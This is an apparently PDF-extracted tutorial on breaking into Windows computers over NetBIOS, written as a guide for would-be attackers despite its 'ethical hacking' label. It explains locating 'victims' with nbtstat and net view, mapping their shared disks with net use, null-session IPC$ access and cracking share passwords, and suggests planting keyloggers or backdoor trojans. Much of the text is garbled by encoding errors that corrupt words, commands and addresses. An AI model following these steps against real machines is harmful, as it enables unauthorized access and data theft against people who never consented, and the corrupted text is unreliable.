NETBIOS BASED HACKING TUTORIAL BY GAURAV KUMAR

ethicalhackers@ah!!"c!#
Note- This tutorial may bear a resemblance to tutorials written by other authors. I have acknowledged to
tutorials or articles that I referred before writing this tutorial. It is possible that there may be other
tutorials I have not referred and are similar to my tutorial. It is not possible for me to give
acknowledgment to such tutorials and hence there must be no copyright or legal issues regarding this
tutorial.
$re%ace
Dear reader I have written this tutorial keeping in mind that readers having only the basic knowledge will also be able
to know how hackers hack using NetBIOS. Using NetBIOS for hacking is the probably the easiest way to hack
remotely. I strongly oppose hacking but not ethical hacking. n ethical hacker is one that hacks computer networks
not for anti social reasons but to let the network administrators know about the security holes so that they can prevent
their computers from hacking. If you want to contact me please send me a mail to ethicalhackers!yahoo.com
Contents-
A brief lesson on NetBIOS
The NBTSTAT command
What you need to hack ?
Types of attacks
Searching for a victim
ets !ack " #art $ %emotely reading&'riting to a victim(s computer
)racking *Share *pass'ords
+sing I#), to hack Windo's NT
#enetrating in to the victim(s computer
ets !ack " #art - .enial of service attack
!o' to protect yourself
________________________________________________________________________________________________________
_____
A BRIE& LESSON ON NETBIOS
NetBIOS stands for Network Basic Input Output System .It was originally developed by IB" and Sytek as an
pplication #rogramming Interface $#I% for client software to access &N resources. If you have e'perience of
working on a &N using "icrosoft (indows Operating Systems $like (indows)* + (indows "e+ (indows N, etc%+
you must have clicked on -Network Neighborhood- to access the computers attached to your network. fter clicking
on the icon you would have seen the names of the computer . Do you know what e'actly happens when you click on
Network Neighborhood. /our computer tries to get the names of the computers attached to the network with by
issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short
NetBIOS gives the various information of the computers on a network . ,hese Include0
Name of the computer
Username
Domain
1omputer Name
and many others.
&ike any other service it also works on a port . It has been assigned a port number 23).
GO TO CONTENTS ___
________________________________________________________________________________________________________
______
THE NBTSTAT COMMAND
/ou can manually interact with the NetBIOS with the help of NB,S,, command. ,o use this command click on the
start button then select 4UN... and type -command- without 5uotes to launch "S0DOS 1ommand #rompt.
lternatively you may click on Start Button then go to #rograms and then select 1ommand #rompt. Once you are in
1ommand #rompt you can e'it by typing command 67I, . ,o launch 1ommand #rompt in full screen mode press
&,86N,64 key combination .,o get back to the original window again press &,86N,64 key combination. If you
have launched the command prompt you will get
c:\windows>
If you do not get windows displayed after c9: don;t worry <ust keep going + all re5uired commands will work fine.
Now lets play with the NB,S,, command.
If you want to get more help from "S0DOS about this command type NB,S,,=. on the prompt i.e.
c:\windows>nbtstat/?
If you want to get the NetBIOS information of your computer type the following command
c:\windows>nbtstat -a 127!!1
,his command will list the NetBIOS information. typical e'ample
N"tB#OS $"%ot" Mac&in" Na%" Tab'"
Na%" N(%b") T*+" ,sa-"
..........................................................................
wo)/-)o(+ !! 0 Do%ain Na%"
%*1co%+(t") !2 , M"ss"n-") S")3ic"
%*(s")na%" !2 , M"ss"n-") S")3ic"
MAC Add)"ss . !!-!2-44-14-22-E5

#lease note that we have used our ip address to be 2>?.@.@.2 . ,his ip address is called as -&oop Back- ip address
because this ip address always refers to the computer you are using.
,his e'ample is self e'planatory . (e need not go in details. (e need to know about the Name and Number. ,he
Name displays the Name of the NetBIOS and there is a corresponding he'agonal number . /ou may see some
additional names in your case.
If you want to get the NetBIOS names of a remote computer+ the command is
c:\windows>nbtstat -a i+add)"ss
6'ample 0 ,o get the NetBIOS names of a computer having ip address >@3.2)A.23B.2AB+ we shall use the command
NO,60>@3.2)A.23B.2AB may be a active ip address of someone;s computer. I am using it only as an e'ample. #lease don;t hack this computer.
c:\windows>nbtstat -a 2!2167125175
If you want to get to know more about the ip address and ports click here
GO TO CONTENTS
____________________________________________________________________________________
8HAT 9O, NEED TO HAC:
ll you need is a (indows based operating system like (indows )* and "e $but I prefer (indows N,+ >@@@+ 7#% and
an internet connection.
GO TO CONTENTS
________________________________________________________________________________________________________
____

T9;ES O< ATTAC:S
(e can launch two types of attack on the remote computer having NetBIOS.
2. 4eading=(riting to a remote computer system
>. Denial of Service
GO TO CONTENTS
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCC
S"a)c&in- =o) a 3icti%
/ou may manually search for the victims by first using the nbtstat 0a ipaddress and then net view ::ipaddress . If at first
you don;t succeed step to ne't ip address until you find a suitable ip address. /ou may also use a port scanner . port
scanner is simply a software that can search for any block of ip address say 2)>.2B*.@.2 to 2)>.2B*.@.>AA for one or
more ports. -Orge- is a port scanner that gives NetBIOS names of the remote computer.
GO TO CONTENTS
________________________________________________________________________________________________________
____
>"ts Hac/ -;a)t 1 $"%ot"'* )"adin-/w)itin- to a 3icti%?s co%+(t")
Believe it or not but NetBIOS is the easiest method to break into somebody;s computer. Dowever there is a condition
that must be satisfied before you can hack. ,he condition is that the victim must have enabled Eile nd #rinter
Sharing on his computer. If the victim has enabled it + the nbtstat command will display one more NetBIOS name. Now
lets us take a e'ample. Suppose you know a ip address that has enabled Eile nd #rinter Sharing and let suppose the
ip address happens to be >@3.2)A.23B.2AB .
If you would like to know more about ip address click here . If you don;t the ip address where Eile and #rinter Sharing
is enabled read -Searching for a victim-
,he command that you will use to view the NetBIOS name is
c:\windows>nbtstat -a 2!2167125175
&et suppose that the output comes out to be
N"tB#OS $"%ot" Mac&in" Na%" Tab'"
Na%" T*+" Stat(s
-------------------------------------------------------------------------------------------------
(s") @!!> ,N#A,E $"-ist")"d
wo)/-)o(+ @!!> 0$O,; $"-ist")"d
(s") @!2> ,N#A,E $"-ist")"d
(s") @2!> ,N#A,E $"-ist")"d
MAC Add)"ss . !!-!2-44-14-22-E5

,he number F>@G shows that the victim has enabled the Eile nd #rinter Sharing.
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0
NO,6 0 If you do not get this number there are two possibilities
2. /ou do not get the number F>@G . ,his shows that the victim has not enabled the Eile nd #rinter Sharing .
>. /ou get -Dost Not found- . ,his shows that the port 23) is closed or the ip address doesn;t e'ists.
---------------------------------------------------------------------------------------------------------
Now our ne't step would be to view the drive or folders the victim is sharing.
(e will use command
c:\windows>n"t 3i"w \\2!2167125175
&et suppose we get the following output
S&a)"d )"so()c"s at \\2!2167125175
Co%+(t")Na%"0o"sH")"
S&a)" na%" T*+" ,s"d as Co%%"nt
-----------------------------------------------------------------------------------------------
CD#S: Dis/

,he command completed successfully.

-DISH- shows that the victim is sharing a Disk named as 1DISH . /ou may also get some additional information like

S&a)"d )"so()c"s at \\2!2167125175

Co%+(t")Na%"0o"sH")"

S&a)" na%" T*+" ,s"d as Co%%"nt

-----------------------------------------------------------------------------------------------
H;-5> ;)int

-#rint - shows that the victim is sharing a printer named as D#0B&
If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard
disks or we may also be able to print anything on a remote printer I Now let us share the victims computer;s hard disk
or printer.
,ill now we know that there is a computer whose ip address happens to be >@3.2)A.23B.2AB and on that computer
Eile and printer sharing is enabled and the victim;s hard disk ;s name is 1DISH.
Now we will connect our computer to that hard disk . fter we have connected successfully a drive will be created on
our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our
newly formed drive to the victim;s share name 1DISH it means that we our drive will have the same contents as that of
the 1DISH .
&ets do it.
(e will use the N6, command to do our work .
&et suppose we want to make a drive k9 on our computer and connect it to victim;s share we will issue the command
c'()i*+!)s,*et -se k' ((./0"123"104"134(CDISK
You may replace k letter by any other letter.
If the command is successful we will get the confirmation 0 T&" co%%and was co%+'"t"d s(cc"ss=('''*
The c!##a*+ )as c!#5lete+ s-ccess%-ll
Now <ust double click on the "y 1omputer icon on your desktop and you will be a happy hackerI
(e have <ust crested a new drive k9 . Just double click on it and you will find that you are able to access the remote
computer;s hard disk. 6n<oy your first hackI
GO TO CONTENTS
________________________________________________________________________________________________________
_____
C)ac/in- S&a)" +asswo)ds
Sometimes when we use -net use k9 ::ipaddress:sharename- we are asked for a password. ,here is a password
cracker -#K(H- . ll you have to enter ip address and the share name and it will decrypt the password within
seconds. #lease note that this can crack only the passwords is the remote operating system is running on 0
(indows )A
(indows )*
(indows "e
GO TO CONTENTS
________________________________________________________________________________________________________
______
,sin- #;CB to &ac/ 8indows NT
Now you must be thinking of something that can crack share passwords on N, based operating systems like
(indows N, and (indows >@@@.
I#1L is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system
to give guest access that is give access without asking for password.
(e hackers use I#1L in this way
c:\windows>n"t (s" /: \\122122122122\i+cB CC /(s"):CC
You may replace k letter by any other letter. If you replace it by -b- $type without 5uotes% a new drive will be created by
a drive letter b.
#lease note that you won;t be able to get access to victim;s shared drives but you you can gather valuable information
like names of all the usernames+ users that have never logged+ and other such information. One such tool that uses
the ipcL method is -Internet #eriscope-
GO TO CONTENTS
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCC

;"n"t)atin- in to t&" 3icti%?s co%+(t")
Now that you have access to a remote computer you may be interested in viewing his secret emails+ download his
mp3 songs + and more...
But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger
or install a back door entry ,ro<an like netbus and backorifice or delete or copy some files. ll these tasks involves
writing to victim;s hard disk . Eor this you need to have write access permission and this can only be granted by the
remote user .
GO TO CONTENTS
________________________________________________________________________________________________________
_____
>"ts Hac/ - ;a)t 2 D"nia' o= s")3ic" attac/

,his type of attacks are meant to be launched by some computer techies because this type of attack involves using
&inu' Operating System and compiling 1 language files .
,he two most common vulnerabilities found in NetBIOS are
Mulnerability 2
Mulnerability >
GO TO CONTENTS
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCC
How to +)ot"ct *o()s"'=
#lease visit windowsupdate.microsoft.com and let the windows update itself.
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCC
,he above tutorial has been written by Naurav Humar
If you need more help please feel free to email me ethicalhackers!yahoo.com
GO TO CONTENTS
END OF TUTORIAL
Join Now 6thicalDackinNroup
By <oining this group you can
share your knowledge+ ask questions+ chat+ discuss topics with other group members. 1lick here to <oin this group.

Other tutorials by Naurav Humar
&& BOU, N6,S,,
&& BOU, I# DD46SS6S
"ore tutorials coming soon...